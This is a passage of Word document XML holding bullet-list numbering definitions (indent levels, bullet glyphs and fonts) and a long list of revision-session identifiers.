      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="24A2BA22">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4468CDFA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="201860E1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3AF4195A"/>
    <w:lvl w:ilvl="0" w:tplc="028E7F66">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CB7E2EDC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="2BEA2646">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8FC2AA4A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7EFA9A58">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="8E6429BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B6E60B8E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9B020C86">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="ACE208DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="30725CB0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B247D7C"/>
    <w:lvl w:ilvl="0" w:tplc="9D4A9DF4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3362B004">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="1FC89040">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="712ADE58">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="728AA9BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D2EA171A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="91E47D52">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="224E801C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="458C9A64">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="452C61A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66125F78"/>
    <w:lvl w:ilvl="0" w:tplc="FC36678E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="11D0A14E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B44C7FAA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="16FAE468">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="08B6B166">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="29E22AD0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D226A4BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="41C6CAD4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A09E4F48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5106BEC6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CFD6EB3C"/>
    <w:lvl w:ilvl="0" w:tplc="1D968C02">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BFDE498E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3A4CD9EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F3F6B81E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="084A74F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="FD485270">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="259AFA54">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2DAEEBC2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="307E9748">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5515A909"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3EB2B42C"/>
    <w:lvl w:ilvl="0" w:tplc="8ED4DB82">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="8EE0CA4A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="05F4E3F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="10364772">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="55D8A738">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A1B8BFAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D41859C0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9886FC66">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7C0068DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6A261FBB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E8AB938"/>
    <w:lvl w:ilvl="0" w:tplc="18CA57CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="EB84EC88">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B8C4B4BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7D0CC9BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="935249CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="843A3CF2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="727677C0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7A9893DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9BF82614">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1027564473">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1110512433">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1938128235">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1124157939">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1476995307">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="708914311">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="834224947">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1698695589">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="13838638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753F67"/>
    <w:rsid w:val="0010AA51"/>
    <w:rsid w:val="00680642"/>
    <w:rsid w:val="007D0621"/>
    <w:rsid w:val="00931D9B"/>
    <w:rsid w:val="00C0646B"/>
    <w:rsid w:val="00CA4A0D"/>
    <w:rsid w:val="00DECE82"/>
    <w:rsid w:val="00E15F74"/>
    <w:rsid w:val="00E4C0B0"/>
    <w:rsid w:val="02753F67"/>
    <w:rsid w:val="070C66C8"/>
    <w:rsid w:val="08362947"/>
    <w:rsid w:val="099986C7"/>
    <w:rsid w:val="0E9EA268"/>
    <w:rsid w:val="104DECD4"/>
    <w:rsid w:val="121E5840"/>
    <w:rsid w:val="12C6F7E0"/>
    <w:rsid w:val="137B224D"/>
    <w:rsid w:val="14736C57"/>
    <w:rsid w:val="14EA0A2F"/>
    <w:rsid w:val="14F2142C"/>
    <w:rsid w:val="14F83F09"/>
    <w:rsid w:val="15A50DFA"/>
    <w:rsid w:val="16F91A55"/>
    <w:rsid w:val="17B3E3BD"/>
    <w:rsid w:val="19B106F7"/>
    <w:rsid w:val="1DFF4D5C"/>
    <w:rsid w:val="201A8376"/>
    <w:rsid w:val="204D7CDC"/>
    <w:rsid w:val="21C1C374"/>
    <w:rsid w:val="2256805E"/>
    <w:rsid w:val="2282F9DF"/>
    <w:rsid w:val="22986406"/>
    <w:rsid w:val="23173ADF"/>
    <w:rsid w:val="250C9E10"/>
    <w:rsid w:val="2521A19E"/>
    <w:rsid w:val="2810B213"/>
    <w:rsid w:val="29ABFF62"/>
    <w:rsid w:val="2AFD6D97"/>
    <w:rsid w:val="2B424DA4"/>
    <w:rsid w:val="2D4FB46F"/>
    <w:rsid w:val="2FD8F3B6"/>
    <w:rsid w:val="3065EF54"/>
    <w:rsid w:val="30B1ADEE"/>
    <w:rsid w:val="3128ECDB"/>
    <w:rsid w:val="33F92B36"/>
    <w:rsid w:val="366AB8F8"/>
    <w:rsid w:val="3747A1D4"/>
    <w:rsid w:val="387D6F4E"/>
    <w:rsid w:val="3DE7215C"/>
    <w:rsid w:val="3FA314B9"/>
    <w:rsid w:val="3FA87A0B"/>
    <w:rsid w:val="3FFE3FE2"/>
    <w:rsid w:val="407ADB0D"/>
    <w:rsid w:val="40C25B8F"/>
    <w:rsid w:val="410002FF"/>
    <w:rsid w:val="41632BFE"/>
    <w:rsid w:val="42B7AEBC"/>
    <w:rsid w:val="436E5B95"/>
    <w:rsid w:val="478232D3"/>
    <w:rsid w:val="4BA8DC1A"/>
    <w:rsid w:val="4BD12B13"/>
    <w:rsid w:val="4D49D4EA"/>
    <w:rsid w:val="4E61CB08"/>
    <w:rsid w:val="4EB9D560"/>
    <w:rsid w:val="51AB3586"/>
    <w:rsid w:val="51DEDA55"/>
    <w:rsid w:val="520FC7F4"/>
    <w:rsid w:val="523DBD32"/>
    <w:rsid w:val="538C36B4"/>
    <w:rsid w:val="53CF6A3F"/>
    <w:rsid w:val="551B5B91"/>
    <w:rsid w:val="568F3D45"/>
    <w:rsid w:val="56F4AB18"/>
    <w:rsid w:val="585649B5"/>
    <w:rsid w:val="58A3BFD2"/>
    <w:rsid w:val="58B98138"/>
    <w:rsid w:val="58E9704C"/>
    <w:rsid w:val="5992FD13"/>
    <w:rsid w:val="59A6BBFD"/>
    <w:rsid w:val="5B234F07"/>
    <w:rsid w:val="5B2B187C"/>
    <w:rsid w:val="5B74E941"/>
    <w:rsid w:val="5B83D9E7"/>
    <w:rsid w:val="5C82DF6A"/>
    <w:rsid w:val="5DC2B6D1"/>
    <w:rsid w:val="5F0BB1DF"/>
    <w:rsid w:val="61025C8F"/>
    <w:rsid w:val="61898DAA"/>
    <w:rsid w:val="62C6AE81"/>
    <w:rsid w:val="63639C51"/>
    <w:rsid w:val="6504CD48"/>
    <w:rsid w:val="654AECDA"/>
    <w:rsid w:val="682DAF7A"/>
    <w:rsid w:val="6A13CF2F"/>
    <w:rsid w:val="6A8963C8"/>
